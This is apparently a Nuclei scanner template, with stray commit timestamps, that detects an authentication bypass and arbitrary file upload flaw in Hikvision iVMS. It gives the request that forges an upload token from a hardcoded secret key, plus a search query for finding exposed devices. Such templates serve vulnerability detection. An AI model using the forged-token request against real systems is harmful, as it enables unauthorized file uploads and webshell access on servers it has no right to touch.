2023-08-24 10:44:56 +00:00
id : hikvision-ivms-file-upload-bypass
info :
2023-08-24 11:44:56 +00:00
name : Hikvison iVMS - File Upload Bypass
2023-08-24 10:44:56 +00:00
author : SleepingBag945
2023-08-24 11:44:56 +00:00
severity : high
description : |
Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
2023-08-24 10:44:56 +00:00
reference :
- https://blog.csdn.net/qq_41904294/article/details/130807691
2023-08-24 11:44:56 +00:00
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB.md
- https://github.com/MD-SEC/MDPOCS/blob/main/Hikvison_iSecure_Center_ResourceOperations_Upload_File_Poc.py
2023-08-24 10:44:56 +00:00
metadata :
verified : true
fofa-query : icon_hash="-911494769"
2023-08-24 11:44:56 +00:00
max-request : 1
2023-08-24 10:44:56 +00:00
tags : hikvision,ivms,intrusive,fileupload,auth-bypass
http :
- raw :
- |
POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
Host : {{Hostname}}
Cookie : ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169
2023-08-24 10:49:35 +00:00
2023-08-24 10:44:56 +00:00
service={{url_encode(concat("{{RootURL}}","/home/index.action"))}}
2023-08-24 10:49:35 +00:00
2023-08-24 10:44:56 +00:00
matchers-condition : and
matchers :
- type : dsl
dsl :
2023-08-24 11:44:56 +00:00
- "status_code == 200"
- "contains(body,'errorMessage') && contains(body,'The current request is not a multipart request')"
2023-08-24 10:44:56 +00:00
condition : and